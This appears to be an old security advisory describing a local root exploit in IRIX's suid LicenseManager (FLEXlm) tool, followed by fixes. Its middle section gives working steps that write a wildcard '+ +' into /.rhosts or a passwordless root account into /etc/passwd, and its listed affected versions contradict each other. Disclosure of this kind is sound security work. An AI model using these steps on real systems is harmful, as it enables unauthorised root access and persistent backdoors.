COMMAND
/usr/etc/LicenseManager (FLEXlm licence subsytem)
SYSTEMS AFFECTED
IRIX 5.3, IRIX 6.0
PROBLEM
The purpose of the LicenseManager program and the FLEXlm license
subsystem is for software licensing. An account on the vulnerable
system is required for exploit. With an account, these
vulnerabilities are exploitable by both local and remote access.
A new, fast, reliable way to get root on your local SGI is given
below. It works on Irix 5.3, 6.2 and 6.3 with
license_eoe.sw.license_eoe installed. IRIX doesn't seem to
have it.
This exploit was made possible by developers who make big, fat
programs like LicenseManager suid.
LicenseManager is GUI to license subsystem. It allows to
install/remove/update FLEXlm and NET_LS licenses. Any regular
user with access to X screen can run it, and it's suid. It will
allow anyone to install licenses, and will prompt for root
password if one wants to remove one. And that's about all
protection it has.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field You can put space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your system has remote root logins disabled, replacing
/.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh will
be helpful. Credit fot this goes to Yuri Volobuev.
SOLUTION
The solution to this problem is to install version 3.0 of the the
License Tools, license_eoe subsystem. To determine the version of
License Tools installed on a particular system, the following
command can be used:
% versions license_eoe
or,
chmod -s /usr/etc/LicenseManager
or,
get new release that fixes this problem.